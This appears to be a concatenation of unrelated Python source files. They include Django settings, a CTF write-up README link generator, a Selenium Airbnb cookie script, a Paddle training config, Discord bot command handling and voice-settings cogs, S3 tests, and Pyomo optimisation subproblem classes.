# settings.base imports settings_secret
# The following settings are defined in settings_secret:
# SECRET_KEY, ADMINS, DATABASES, EMAIL_HOST, EMAIL_PORT, DEFAULT_FROM_EMAIL
# Debug should be True in development but not in production!
DEBUG = True
# A list of directories where Django looks for translation files.
LOCALE_PATHS = (
# '/home/heilniem/signbank-fi/locale',
'C://utv//testPyCharmCE//FinSLsignbank//locale',
# 'C://Users//localperla331//PycharmProjects//FinSLsignbank//locale',
)
# The absolute path to the directory where collectstatic will collect static files for deployment.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = '/home/heilniem/signbank-fi/static/'
# This setting defines the additional locations the staticfiles app will traverse if the FileSystemFinder finder
# is enabled, e.g. if you use the collectstatic or findstatic management command or use the static file serving view.
STATICFILES_DIRS = (
os.path.join(PROJECT_DIR, "signbank", "static"),
)
# Absolute filesystem path to the directory that will hold user-uploaded files.
MEDIA_ROOT = 'C:/data/teckenvideo'
# URL that handles the media served from MEDIA_ROOT, used for managing stored files.
# It must end in a slash if set to a non-empty value.
MEDIA_URL = '/media/'
# Within MEDIA_ROOT we store newly uploaded gloss videos in this directory
GLOSS_VIDEO_DIRECTORY = 'glossvideo'
# location and URL for uploaded files
UPLOAD_ROOT = MEDIA_ROOT + "upload/"
UPLOAD_URL = MEDIA_URL + "upload/"
# To test emailing, use this to show emails in the console
#EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
},
'file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': os.path.join(PROJECT_DIR, 'debug.log'),
# 'filename': 'C://Users//localperla331//PycharmProjects//log//signbankdebug.log',
},
},
'loggers': {
'django.request': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': True,
},
'django.db.backends': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': False,
},
},
}
# Turn on lots of logging
# DO_LOGGING = True
# LOG_FILENAME = "debug.log"
if DEBUG:
# Setting up debug toolbar.
MIDDLEWARE.append('debug_toolbar.middleware.DebugToolbarMiddleware')
INSTALLED_APPS += ('debug_toolbar',)
| StarcoderdataPython |
3383559 | <gh_stars>0
import os
from os import listdir
from os.path import join, isdir, basename
import sys
base_dir = 'CTFS-2021'
prefix = '/ctf-writeups-2021'
ctf_path = sys.argv[1]
full_path = join(prefix,base_dir,ctf_path)
def link(path):
full_path = join(prefix,base_dir,path)
return f'## [{basename(path)}]({full_path}) \n'
rootfile = 'CTFS-2021/README.md'
with open(rootfile,'a') as f:
f.write(link(ctf_path))
def make_links(path):
print(path)
directories = ['..']
for i in listdir(join(base_dir,path)):
if isdir(join(base_dir,path,i)):
directories.append(i)
with open(join(base_dir,path,'README.md'),'a') as f:
for i in directories:
f.write(link(join(path,i)))
for i in directories[1:]:
print(i)
make_links(join(path,i))
make_links(ctf_path)
| StarcoderdataPython |
11259082 | from selenium import webdriver
import pickle
import time
import os
"""
options = webdriver.ChromeOptions()
options.add_argument('--ignore-certificate-errors')
options.add_argument("--test-type")
options.binary_location = "/"
"""
profile = webdriver.FirefoxProfile()
profile.set_preference('browser.download.folderList', 2) # custom location
profile.set_preference('browser.download.manager.showWhenStarting', False)
profile.set_preference('browser.download.dir', os.getcwd())
profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'application/octet-stream')
driver = webdriver.Firefox(firefox_profile=profile)
driver.get('https://www.airbnb.it/hosting/reservations/upcoming')
cookies = pickle.load(open("cookiesairbnb.pkl", "rb"))
for cookie in cookies:
driver.add_cookie(cookie)
#print(cookie)
driver.get('https://www.airbnb.it/hosting/reservations/upcoming')
csvUrl='https://www.airbnb.it/hosting/reservations/export.csv?sort_field=status&sort_order=asc&status=accepted&tab=upcoming&page=1'
listaPaginePath='/html/body/div[3]/div/div[1]/div[2]/div/section/footer/div/nav/span/div/ul'
listaPagine=driver.find_element_by_xpath(listaPaginePath)
print(listaPagine.getSize())
#driver.get(csvUrl)
time.sleep(10)
pickle.dump( driver.get_cookies() , open("cookiesairbnb.pkl","wb"))
| StarcoderdataPython |
6440458 | import os
import logging
import codecs
__log_dir='/home/aistudio/logs'
train_params = {
"img_size": [3,224,224],
"class_num": -1,
"image_num": -1,
"label_dict":{},
"data_dir": '/home/aistudio/data/data504/vegetables',
'train_list': 'train_labels.txt',
'eval_list': 'eval_labels.txt',
'label_list': 'label_list.txt',
"continue_train": False,
"pretrained": False,
'pretrained_dir': '',
'mode':'train',
'num_epoch': 10,
'batch_size': 64,
'mean_rgb':[127.5,127.5,127.5],
'use_gpu':False,
'img_process_method': {
'is_distort':True,
'is_rotate':True,
'is_crop':True,
'is_flip':True,
'hue_prob':0.5,
'hue_delta':18,
'contrast_prob':0.5,
'contrast_delta':0.5,
'saturation_prob':0.5,
'saturation_delta':0.5,
'brightness_prob':0.5,
'brightness_delta':0.125
},
'early_stop': { # 没发现用到的地方
'sample_frequency':50,
'successsive_limit':3,
'good_acc': 0.92
},
'learning_strategy':{ # 有的参数在没有用到
'name':'cosins_decay',
'epochs':[40,80,100],
'steps':[0.1,0.01,0.001,0.0001]
},
'learning_rate':0.0125
}
def init_train_parameters():
label_list=os.path.join(train_params['data_dir'],train_params['label_list'])
train_list=os.path.join(train_params['data_dir'],train_params['train_list'])
class_num=0
with codecs.open(label_list,encoding='utf-8') as l_list:
lines=[line.strip() for line in l_list]
for line in lines:
parts=line.strip().split()
train_params['label_dict'][parts[1]]=int(parts[0])
class_num += 1
train_params['class_num']=class_num
with codecs.open(train_list,encoding='utf-8') as t_list:
lines =[line.strip() for line in t_list]
train_params['image_num']=len(lines)
def init_log_config():
logger=logging.getLogger()
logger.setLevel(logging.INFO)
if not os.path.exists(__log_dir):
os.mkdir(__log_dir)
log=os.path.join(__log_dir,'train_log.log')
sh=logging.StreamHandler() # 输出到命令行的Handler
fh=logging.FileHandler(log,mode='w')
fh.setLevel(logging.DEBUG)
formatter= logging.Formatter('{asctime:s} - {filename:s}[line:{lineno:d}] - {levelname:s} : {message:s}',style='{')
fh.setFormatter(formatter)
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
return logger
logger = init_log_config()
init_train_parameters()
if __name__=='__main__':
logger.info('successfully log')
print(train_params)
| StarcoderdataPython |
1979075 |
from typing import ClassVar, TypeVar
from typing_extensions import Self
from dubious.discord import api, enums, make
from dubious.Interaction import Ixn, makeIxn
from dubious.Machines import Check, Command, Handle
from dubious.Pory import Chip, Pory
class Pory2(Pory):
""" A collection of `Command`-wrapped methods that registers each method as
a Discord Application Command. Also collects `Handle`s.
Pre-defined is a method called when the `Chip` catches a `tcode.Ready`
payload. This method automatically registers all `Command`s via the
`http` api.
Also pre-defined is a method called when the `Chip` catches a
`tcode.InteractionCreate` payload. This method calls the coresponding
`Command` method on this `Pory2`.
For convenience, the `.TEST_IN` ClassVar will make all `Command`s in
this Pory2 register in the guild with the specified ID. """
commands: dict[str, Command]
def __init_subclass__(cls):
super().__init_subclass__()
cls.commands = Command.collectByReference(cls)
TEST_IN: ClassVar[api.Snowflake | str | int | None] = None
supercommand: ClassVar[Command | None] = None
doPrintCommands: ClassVar = True
def printCommand(self, *message):
if self.doPrintCommands:
print(*message)
def use(self, chip: Chip | Self):
if not isinstance(chip, Chip):
supercommand = (
chip.supercommand if chip.supercommand else
Command.new(chip.__class__.__name__, "No descrpition provided.")
)
return super().use(chip)
@Handle(enums.tcode.Ready, order = 5)
async def _registerCommands(self, _):
t_RegdCommands = dict[str, api.ApplicationCommand]
t_GuildRegdCommands = dict[api.Snowflake, t_RegdCommands]
def dictify(ls: list[api.ApplicationCommand]):
return {command.name: command for command in ls}
regdGlobally: t_RegdCommands = dictify(await self.http.getGlobalCommands())
regdGuildly: t_GuildRegdCommands = {}
for guildID in self.guildIDs:
regdGuildly[guildID] = dictify(await self.http.getGuildCommands(guildID))
for pendingCommand in self.__class__.commands.values():
if self.TEST_IN: pendingCommand.guildID = api.Snowflake(self.TEST_IN)
await self._processPendingCommand(pendingCommand, regdGlobally, regdGuildly)
for remainingCommand in regdGlobally.values():
self.printCommand(f"deleting `{remainingCommand.name}`")
await self.http.deleteCommand(remainingCommand.id)
for guildID in regdGuildly:
for remainingGuildCommand in regdGuildly[guildID].values():
self.printCommand(f"deleting `{remainingGuildCommand.name}` from guild {remainingGuildCommand.guild_id}")
await self.http.deleteGuildCommand(guildID, remainingGuildCommand.id)
async def _processPendingCommand(self,
pendingCommand: make.Command,
regdGlobally: dict[str,
api.ApplicationCommand],
regdGuildly: dict[api.Snowflake,
dict[str,
api.ApplicationCommand]]
):
if pendingCommand.guildID:
if not pendingCommand.guildID in regdGuildly:
self.printCommand(f"creating `{pendingCommand.name}` in guild {pendingCommand.guildID}")
return await self.http.postGuildCommand(pendingCommand.guildID, pendingCommand)
regdCommands = regdGuildly[pendingCommand.guildID]
if not pendingCommand.name in regdCommands:
self.printCommand(f"creating `{pendingCommand.name}` in guild {pendingCommand.guildID}")
return await self.http.postGuildCommand(pendingCommand.guildID, pendingCommand)
regdCommand = regdCommands.pop(pendingCommand.name)
if pendingCommand.eq(regdCommand):
self.printCommand(f"matched `{pendingCommand.name}` in guild {pendingCommand.guildID}")
return
self.printCommand(f"patching `{pendingCommand.name}` in guild {pendingCommand.guildID}")
return await self.http.patchGuildCommand(pendingCommand.guildID, regdCommand.id, pendingCommand)
if not pendingCommand.name in regdGlobally:
self.printCommand(f"creating `{pendingCommand.name}`")
return await self.http.postCommand(pendingCommand)
regdCommand = regdGlobally.pop(pendingCommand.name)
if pendingCommand.eq(regdCommand):
self.printCommand(f"matched `{pendingCommand.name}`")
return
self.printCommand(f"patching `{pendingCommand.name}`")
return await self.http.patchCommand(regdCommand.id, pendingCommand)
@Handle(api.tcode.InteractionCreate)
async def _interaction(self, interaction: api.Interaction):
if interaction.data:
ixn = makeIxn(interaction, self.http)
if interaction.type == enums.InteractionEventTypes.ApplicationCommand:
match interaction.data.type:
case enums.ApplicationCommandTypes.ChatInput:
await self._chatInput(ixn, interaction.data)
async def _chatInput(self, ixn: Ixn, data: api.InteractionData):
if not data.name: raise AttributeError()
command = self.__class__.commands.get(data.name)
if not command: raise RuntimeError(f"Tried to run callback for command {data.name} but no callback existed.")
params = self._processOptions(command, data, data.resolved)
await command.call(self, ixn, **params)
def _processOptions(self,
command: Command,
data: api.InteractionData | api.InteractionCommandDataOption,
resolved: api.InteractionCommandDataResolved | None,
params: dict | None = None
):
if not params: params = {}
if not data.options: return params
for option in data.options:
if option.type in [
enums.CommandOptionTypes.SubCommand,
enums.CommandOptionTypes.SubCommandGroup
]:
param = self._processOptions(command, option, resolved, params)
else:
param = self._getParamsForCommand(command, option, resolved)
params[option.name] = param
return params
def _getParamsForCommand(self,
command: Command,
option: api.InteractionCommandDataOption,
resolved: api.InteractionCommandDataResolved | None
):
hint = command.getOption(option.name)
if not hint: raise ValueError(f"Function for Command `{command.reference()}` got unexpected option `{option.name}`")
param = option.value
# We have to fix up the Member objects to include the users that have been resolved alongside them.
if resolved and resolved.members:
if not resolved.users: resolved.users = {}
for memberID, member in resolved.members.items():
if memberID in resolved.users:
member.user = resolved.users[memberID]
t_Resolved = TypeVar("t_Resolved", bound=api.Disc)
def _cast(resolvedObjects: dict[api.Snowflake, t_Resolved] | None):
if resolvedObjects is None: raise AttributeError()
if not isinstance(option.value, (int, str)):
raise ValueError(f"Function for command `{command.reference()}` got an unknown option value (`{option.value}`) for option `{option.name}`")
id_ = api.Snowflake(option.value)
if id_ in resolvedObjects:
return resolvedObjects[id_]
else:
raise ValueError(f"Function for command `{command.reference()}` couldn't find a resolved object for option `{option.name}`")
match hint.type:
case enums.CommandOptionTypes.User:
param = _cast(resolved.users if resolved else None)
case enums.CommandOptionTypes.Member:
param = _cast(resolved.members if resolved else None)
case enums.CommandOptionTypes.Role:
param = _cast(resolved.roles if resolved else None)
case enums.CommandOptionTypes.Channel:
param = _cast(resolved.channels if resolved else None)
case enums.CommandOptionTypes.Mentionable:
if not isinstance(param, (int, str)): raise ValueError()
param = api.Snowflake(param)
case enums.CommandOptionTypes.SubCommand | enums.CommandOptionTypes.SubCommandGroup:
param = option
return param
| StarcoderdataPython |
3383413 | <filename>tests/s3_manager_test.py<gh_stars>0
import pytest
from logger import logger
from ..manager.s3_manager import download_from_s3, upload_to_s3_repo_sofr
@pytest.mark.skip(reason="temp")
def test_download_from_s3():
download_path = "/tmp/package.zip"
s3_path = "s3://eternity02.deployment/lambda/data-collector-repo-sofr-app/deployment/package.zip"
download_from_s3(s3_path, download_path)
@pytest.mark.skip(reason="temp")
def test_upload_to_s3():
upload_path = 'data-collector-repo-sofr-app.zip'
filename = 'data-collector-repo-sofr-app.zip'
upload_to_s3_repo_sofr(upload_path, filename) | StarcoderdataPython |
11285478 | """Implements and manages all sub-problems"""
import logging
from abc import ABC
import numpy as np
from pyomo.core import ConcreteModel, Param, RangeSet, Var, ConstraintList, \
Objective, minimize, maximize
from pyomo.core.expr.visitor import identify_variables, replace_expressions
from pyomo.environ import Binary, Integers, Reals, SolverStatus, \
TerminationCondition
from pyomo.opt import SolverFactory
logger = logging.getLogger('decogo')
class PyomoSubProblemBase(ABC):
"""Base class for construction of Pyomo model. Here are implemented
methods for creating local linear and nonlinear constraints
:param block_model: Block model
:type block_model: BlockModel
:param block_id: Block identifier
:type block_id: int
:param model: Pyomo model
:type model: ConcreteModel
"""
def __init__(self, sub_models, cuts, block_id):
"""Constructor method"""
super().__init__()
self.block_id = block_id
self.sub_model = sub_models[block_id]
self.cuts = cuts
self.model = ConcreteModel()
self.model.Y = Var(RangeSet(cuts.block_sizes[block_id]))
for n in range(1, self.sub_model.block_size + 1):
lb = self.sub_model.variables[n - 1].lower_bound
self.model.Y[n].value = lb
self.model.Y[n].setlb(lb)
ub = self.sub_model.variables[n - 1].upper_bound
self.model.Y[n].setub(ub)
if self.sub_model.variables[n - 1].type == "Binary":
self.model.Y[n].domain = Binary
self.model.Y[n].value = 0
elif self.sub_model.variables[n - 1].type == "Integers":
self.model.Y[n].domain = Integers
else:
self.model.Y[n].domain = Reals
self.model.lin_con = ConstraintList()
def lin_con_rule(model, k, m):
return sum(cuts.local_cuts[k][m].lhs[self.block_id, n] *
model.Y[n + 1] for n in range(sub_models[k].block_size))
for m, local_constr in enumerate(cuts.local_cuts[block_id]):
if local_constr.relation == "<=":
self.model.lin_con.add(expr=lin_con_rule(self.model, block_id,
m) <= local_constr.rhs)
elif local_constr.relation == "=":
self.model.lin_con.add(expr=lin_con_rule(self.model, block_id,
m) == local_constr.rhs)
elif local_constr.relation == ">=":
self.model.lin_con.add(expr=lin_con_rule(self.model, block_id,
m) >= local_constr.rhs)
self.model.nonlin_constr = ConstraintList()
for constr in self.sub_model.nonlin_constr:
expr = constr.expr.clone()
vars_in_expr = identify_variables(expr)
substitution_map = {} # map for replacing the objects in
# the expression
for var in vars_in_expr:
index = self.sub_model.vars_in_block.index(
var.name)
substitution_map[id(var)] = self.model.Y[index + 1]
new_expr = replace_expressions(expr, substitution_map)
self.model.nonlin_constr.add(expr=new_expr)
def solve(self, solver_name, start_point=None, solver_options=None):
"""Base method for calling the external solver to solve the model
:param solver_name: External solver name
:type solver_name: str
:param start_point: Starting point for the solver, defaults to ``None``
:type start_point: ndaray or None
:param solver_options: Options for external solver, defaults to ``None``
:type solver_options: list
:return: Solution point, primal bound, dual bound, flag if the primal \
bound is feasible
:rtype: tuple
"""
if start_point is not None:
for i in range(len(self.model.Y)):
self.model.Y[i + 1].value = start_point[i]
# solving the problem
opt = SolverFactory(solver_name)
# # set solver options
# # options are pairs: (parameter name, value)
# if solver_options is not None:
# for key, value in solver_options:
# opt.options[key] = value
#
# results = opt.solve(self.model, tee=False)
def recursive_solve(opt_recursive, options=None, iter_i=10):
solver_error = False
try:
if options is not None:
for key, value in solver_options:
opt_recursive.options[key] = value
result_recursive = opt_recursive.solve(self.model, tee=False)
except ValueError as error:
logger.info(error)
if iter_i - 2 < 6:
logger.info('error: cannot solve')
solver_error = True
result_recursive = None
else:
logger.info('solve: max_iter = {0}'.format(iter_i - 2))
result_recursive, solver_error = \
recursive_solve(opt_recursive, options=('max_iter',
iter_i - 2),
iter_i=iter_i - 2)
return result_recursive, solver_error
results, error_in_solver = recursive_solve(opt, solver_options)
sol_is_feasible = True
dual_bound = None
primal_bound = None
y_new = np.zeros(shape=len(self.model.Y))
if error_in_solver:
sol_is_feasible = False
else:
if results.solver.status == SolverStatus.ok:
sol_is_feasible = True
elif results.solver.status == SolverStatus.warning:
if results.solver.termination_condition == \
TerminationCondition.infeasible:
sol_is_feasible = False
logger.info(self.model.name + ' is infeasible')
elif results.solver.termination_condition == \
TerminationCondition.maxIterations:
sol_is_feasible = False
for i in range(len(self.model.Y)):
y_new[i] = self.model.Y[i + 1].value
primal_bound = self.model.obj.expr()
# by default dual bound is equal to primal bound
dual_bound = primal_bound
if solver_name == 'scip' and solver_options is not None:
log_lines = opt._log.split('\n')
for line in log_lines:
if line.startswith('Dual Bound'):
dual_bound = float(line.split(':')[1].strip())
return y_new, primal_bound, dual_bound, sol_is_feasible
def add_linear_constraint(self):
"""Adds new linear constraint"""
def lin_con_rule(model, constr):
return sum(constr.lhs[self.block_id, n] * model.Y[n + 1]
for n in
range(self.cuts.block_sizes[self.block_id]))
constr = self.cuts.local_cuts[self.block_id][
-1] # this takes the last one
if constr.relation == "<=":
self.model.lin_con.add(
expr=lin_con_rule(self.model, constr) <= constr.rhs)
elif constr.relation == "=":
self.model.lin_con.add(
expr=lin_con_rule(self.model, constr) == constr.rhs)
elif constr.relation == ">=":
self.model.lin_con.add(
expr=lin_con_rule(self.model, constr) >= constr.rhs)
def set_nlp(self):
"""Relaxes integer varaibles to continious"""
for i, var_domain in enumerate(
self.sub_model.variables):
if var_domain.type == "Integers":
self.model.Y[i + 1].domain = Reals
elif var_domain.type == "Binary":
self.model.Y[i + 1].domain = Reals
def unset_nlp(self):
"""Sets to integer type for the variables which are integer in the
original formulation"""
for i, var_domain in enumerate(
self.sub_model.variables):
if var_domain.type == "Integers":
self.model.Y[i + 1].domain = Integers
elif var_domain.type == "Binary":
self.model.Y[i + 1].domain = Binary
def update_var_lower_bound(self, index):
"""Updates the lower bound of the variable. The value is taken form
the BlockModel
:param index: Index (block_id, index)
:type index: tuple
"""
k, i = index
self.model.Y[i + 1].setlb(
self.sub_models[k].variables[i].lower_bound)
def update_var_upper_bound(self, index):
"""Updates the upper bound of the variable. The value is taken form
the BlockModel
:param index: Index (block_id, index)
:type index: tuple
"""
k, i = index
self.model.Y[i + 1].setub(
self.sub_models[k].variables[i].upper_bound)
def fix_integers(self, x):
"""Fixes integer variables with given value
:param x: Given array
:type x: ndarray
"""
for i, var in enumerate(
self.sub_model.variables):
if var.type == 'Integer' or var.type == 'Binary':
self.model.Y[i + 1].value = x[i]
self.model.Y[i + 1].fix()
def unfix_integers(self):
"""Unfixes all integer variables"""
for i, var in enumerate(
self.sub_model.variables):
if var.type == 'Integers' or var.type == 'Binary':
self.model.Y[i + 1].unfix()
def add_objective(self):
"""Sets default objective function, i.e. :math:`c_k^Tx_k`, where
:math:`c_k` - partial objective from the original model
"""
def objective_rule(model):
ans_obj = 0
ans_obj += sum(
self.cuts.obj.c[self.block_id, n] * model.Y[n + 1]
for n in range(self.cuts.block_sizes[self.block_id]))
ans_obj += self.cuts.obj.const
return ans_obj
self.model.del_component('obj')
self.model.obj = Objective(rule=objective_rule, sense=minimize)
def set_objective(self, direction):
"""Sets the objective function with given direction vector
:param direction: Given vector
:type direction: ndarray
"""
new_obj_expr = sum(direction[n] * self.model.Y[n + 1]
for n in range(
self.sub_model.block_size))
self.model.del_component('obj')
self.model.obj = Objective(expr=new_obj_expr)
class PyomoMinlpSubProblem(PyomoSubProblemBase):
"""Class for defining the following sub-problem
.. math::
\\begin{equation}
\\begin{split}
\\min \\ &d_k^Ty_k, \\newline
&y_k \\in X_k, d_k \\in \\mathbb{R}^{n_k}
\\end{split}
\\end{equation}
"""
def __init__(self, sub_models, cuts, block_id):
"""Constructor method"""
super().__init__(sub_models, cuts, block_id)
class PyomoProjectionSubProblem(PyomoSubProblemBase):
"""Class for defining a projection sub-problem
.. math::
\\begin{equation}
\\begin{split}
\\min \\ &||y_k-x_k||^2,\\newline
&y_k \\in G_k, x_k \\text{ is fixed}
\\end{split}
\\end{equation}
"""
def __init__(self, sub_models, cuts, block_id):
"""Constructor method"""
super().__init__(sub_models, cuts, block_id)
self.model.X = Param(RangeSet(self.cuts.block_sizes[block_id]),
mutable=True, initialize=0)
self.model.obj = Objective(expr=self.obj_rule())
self.model.name = 'Projection sub problem'
def obj_rule(self):
"""Defines the objective function
:return: Objective expression
:rtype: Expression
"""
expr = sum(pow((self.model.Y[n + 1] - self.model.X[n + 1]), 2)
for n in
range(self.sub_model.block_size))
return expr
def set_projection_point(self, point_to_project):
"""Sets projection point, i.e. :math:`x_k`
:param point_to_project: Projection point
:type point_to_project: ndarray
"""
for i in range(len(self.model.X)):
self.model.X[i + 1].value = point_to_project[i]
class PyomoResourceProjectionSubProblem(PyomoSubProblemBase):
"""Class for defining a projection sub-problem
.. math::
\\begin{equation}
\\begin{split}
\\min \\ &||A_kx_k - w_k||^2,\\newline
&y_k \\in G_k, w_k \\text{ is fixed}
\\end{split}
\\end{equation}
"""
def __init__(self, sub_models, cuts, block_id):
"""Constructor method"""
super().__init__(sub_models, cuts, block_id)
self.model.w = Param(RangeSet(self.cuts.num_of_global_cuts + 1),
mutable=True, initialize=0)
self.model.obj = Objective(expr=self.obj_rule())
self.model.name = 'Resource projection sub problem'
def obj_rule(self):
"""Defines the objective function
:return: Objective expression
:rtype: Expression
"""
expr = 0
for j in range(self.cuts.num_of_global_cuts + 1):
if j == 0:
expr += \
(sum(self.cuts.obj.c[self.block_id, i] * self.model.Y[i + 1]
for i in range(self.cuts.block_sizes[self.block_id])) -
self.model.w[j + 1]) ** 2
else:
expr += \
(sum(self.cuts.global_cuts[j - 1].lhs[self.block_id, i] *
self.model.Y[i + 1]
for i in range(self.cuts.block_sizes[self.block_id])) -
self.model.w[j + 1]) ** 2
return expr
def set_projection_point(self, point_to_project):
"""Sets projection point, i.e. :math:`w_k`
:param point_to_project: Projection point
:type point_to_project: ndarray
"""
for i in range(len(self.model.w)):
self.model.w[i + 1].value = point_to_project[i]
class PyomoLineSearchSubProblem(PyomoSubProblemBase):
"""Class defines line search sub-problem between exterior point
:math:`x_k^{ext}` and interior point :math:`x_k^{int}`
.. math::
\\begin{equation}
\\begin{split}
\\max \\ & \\alpha, \\newline
&y_k = \\alpha x_k^{ext} + (1 - \\alpha) x_k^{int}, \\newline
&y_k \\in X_k
\\end{split}
\\end{equation}
"""
def __init__(self, sub_models, cuts, block_id):
super().__init__(sub_models, cuts, block_id)
self.model.lin_con.deactivate()
# variable for finding the point on the line between x_hat and x_star
self.model.alpha = Var(bounds=(0, 1), initialize=0, within=Reals)
# objective
self.model.obj = Objective(expr=self.model.alpha, sense=maximize)
self.model.interior_point = Param(
RangeSet(self.cuts.block_sizes[block_id]), mutable=True,
initialize=0)
self.model.exterior_point = Param(
RangeSet(self.cuts.block_sizes[block_id]), mutable=True,
initialize=0)
self.model.line_search_con = ConstraintList()
for i in range(self.cuts.block_sizes[self.block_id]):
self.model.line_search_con.add(
self.model.Y[i + 1] == self.model.alpha *
self.model.exterior_point[i + 1] +
(1 - self.model.alpha) * self.model.interior_point[i + 1])
def set_interior_exterior_points(self, exterior_point, interior_point):
"""Sets values of two endpoints
:param exterior_point: Exterior point
:type exterior_point: ndarray
:param interior_point: Interior point
:type interior_point: ndarray
"""
for i in range(self.cuts.block_sizes[self.block_id]):
self.model.exterior_point[i + 1].value = exterior_point[i]
self.model.interior_point[i + 1].value = interior_point[i]
def solve(self, solver_name, start_point=None, solver_options=None):
"""Solves the subproblem and gets value of :math:`\\alpha`. For more
info, see base method :meth:`SubProblemBase.solve`
"""
y_new, primal_bound, dual_bound, sol_is_feasible = \
super().solve(solver_name, start_point=start_point,
solver_options=solver_options)
alpha = self.model.alpha.value
return alpha, y_new
| StarcoderdataPython |
3469218 | <filename>src/simplelayout/cli/__init__.py<gh_stars>0
from simplelayout.cli.cli_generate import get_options # noqa
| StarcoderdataPython |
1977173 | from discord.ext import commands
import discord
voice_setting = """
`::voice <音声の種類(A,B,C,Dのいずれか)>` で音声の種類を変更できます。
`::speed <スピード>` でスピードの変更ができます。デフォルトは1.0です。
`::pitch <ピッチ>` でピッチの変更ができます。デフォルトは0.0です。
"""
def yomiage(a): return '読み上げる' if a else '読み上げない'
class VoiceSetting(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.group(invoke_without_command=True)
async def voice(self, ctx, voice_type=None):
"""現在の音声設定を表示 voice_typeを指定すると変更"""
if voice_type is None:
setting = await self.bot.db.get_user_setting(str(ctx.author.id))
embed = discord.Embed(title=f"{ctx.author}さんの現在の音声設定")
embed.add_field(name="音声の種類", value=f"{setting['voice']}")
embed.add_field(name="スピード", value=f"{setting['speed']}")
embed.add_field(name="ピッチ", value=f"{setting['pitch']}")
embed.add_field(name="変更方法", value=voice_setting)
await ctx.send(embed=embed)
return
if voice_type not in ["A", "B", "C", "D", "a", "b", "c", "d"]:
await ctx.send("音声の種類はA,B,C,Dのいずれかで選択してください。")
return
# タイプ設定の処理
await self.bot.db.set_user_setting(ctx.author.id, voice=voice_type.upper())
await ctx.send(f'{ctx.author.mention}, 声の設定を{voice_type}に変更しました。')
@commands.command()
async def speed(self, ctx, speed: float):
if 0.25 <= speed <= 4.0:
await self.bot.db.set_user_setting(ctx.author.id, speed=speed)
await ctx.send(f"{ctx.author.mention}, スピードの設定を{speed}に変更しました。")
return
await ctx.send("スピードは0.5から4.0の間で設定してください。")
@commands.command()
async def pitch(self, ctx, pitch: float):
if -6.5 <= pitch <= 6.5:
await self.bot.db.set_user_setting(ctx.author.id, pitch=pitch)
await ctx.send(f"{ctx.author.mention}, ピッチの設定を{pitch}に変更しました。")
return
await ctx.send('ピッチは-6.5から6.5の間で設定してください。')
@commands.group(invoke_without_command=True, aliases=['pref'])
async def setting(self, ctx):
await ctx.send(f"botのメッセージを読み上げるか: {self.bot.guild_setting[ctx.guild.id]['bot']}\n"
f"名前を読み上げるか: {self.bot.guild_setting[ctx.guild.id]['name']}\n"
f"絵文字を読み上げるか: {self.bot.guild_setting[ctx.guild.id]['emoji']}\n"
f"読み上げ上限文字数: {self.bot.guild_setting[ctx.guild.id]['limit']}文字\n"
f"再接続するか: {self.bot.guild_setting[ctx.guild.id]['keep']}")
return
@setting.command()
async def bot(self, ctx):
r = await self.bot.db.get_guild_setting('bot', ctx.guild.id)
await self.bot.db.set_guild_setting('bot', ctx.guild.id, not r)
await self.bot.update_guild_setting(ctx.guild.id)
await ctx.send(f'botのメッセージを読み上げるかの設定を`{yomiage(r)}`から{yomiage(not r)}に変更しました。')
@setting.command()
async def name(self, ctx):
r = await self.bot.db.get_guild_setting('name', ctx.guild.id)
await self.bot.db.set_guild_setting('name', ctx.guild.id, not r)
await self.bot.update_guild_setting(ctx.guild.id)
await ctx.send(f'名前を読み上げるかの設定を`{yomiage(r)}`から{yomiage(not r)}に変更しました。')
@setting.command()
async def emoji(self, ctx):
r = await self.bot.db.get_guild_setting('emoji', ctx.guild.id)
await self.bot.db.set_guild_setting('emoji', ctx.guild.id, not r)
await self.bot.update_guild_setting(ctx.guild.id)
await ctx.send(f'絵文字を読み上げるかの設定を`{yomiage(r)}`から{yomiage(not r)}に変更しました。')
@setting.command()
async def limit(self, ctx, limit: int):
if limit <= 0 or limit > 2000:
await ctx.send('その値は指定できません。')
return
r = await self.bot.db.set_limit(ctx.guild.id, limit)
await self.bot.update_guild_setting(ctx.guild.id)
await ctx.send(f'最大読み上げ文字数を{r}から{limit}に変更しました。')
@setting.command(name="keep-alive")
async def keep_alive(self, ctx):
r = await self.bot.db.get_guild_setting('keep', ctx.guild.id)
await self.bot.db.set_guild_setting('keep', ctx.guild.id, not r)
await self.bot.update_guild_setting(ctx.guild.id)
def setup(bot):
return bot.add_cog(VoiceSetting(bot))
| StarcoderdataPython |
8095714 | # flake8: noqa
from __future__ import annotations
def check_pickle(xThing, lTested = None):
# https://stackoverflow.com/a/50049341/545637
# FIXME: clean up an use exceptions
import pickle
lTested = [] if lTested is None else lTested
if id(xThing) in lTested:
return lTested
sType = type(xThing).__name__
print('Testing {0}...'.format(sType))
if sType in ['type','int','str', 'bool', 'NoneType', 'unicode']:
print('...too easy')
return lTested
if sType == 'dict':
print('...testing members')
for k in xThing:
lTested = check_pickle(xThing[k], lTested)
print('...tested members')
return lTested
if sType == 'list':
print('...testing members')
for x in xThing:
lTested = check_pickle(x)
print('...tested members')
return lTested
lTested.append(id(xThing))
oClass = type(xThing)
for s in dir(xThing):
if s.startswith('_'):
print('...skipping *private* thingy')
continue
#if it is an attribute: Skip it
try:
xClassAttribute = oClass.__getattribute__(oClass,s)
except (AttributeError, TypeError):
pass
else:
if type(xClassAttribute).__name__ == 'property':
print('...skipping property')
continue
xAttribute = xThing.__getattribute__(s)
print('Testing {0}.{1} of type {2}'.format(sType,s,type(xAttribute).__name__))
if type(xAttribute).__name__ == 'function':
print("...skipping function")
continue
if type(xAttribute).__name__ in ['method', 'instancemethod']:
print('...skipping method')
continue
if type(xAttribute).__name__ == 'HtmlElement':
continue
if type(xAttribute) == dict:
print('...testing dict values for {0}.{1}'.format(sType,s))
for k in xAttribute:
lTested = check_pickle(xAttribute[k])
continue
print('...finished testing dict values for {0}.{1}'.format(sType,s))
try:
oIter = xAttribute.__iter__()
except (AttributeError, TypeError):
pass
except AssertionError:
pass #lxml elements do this
else:
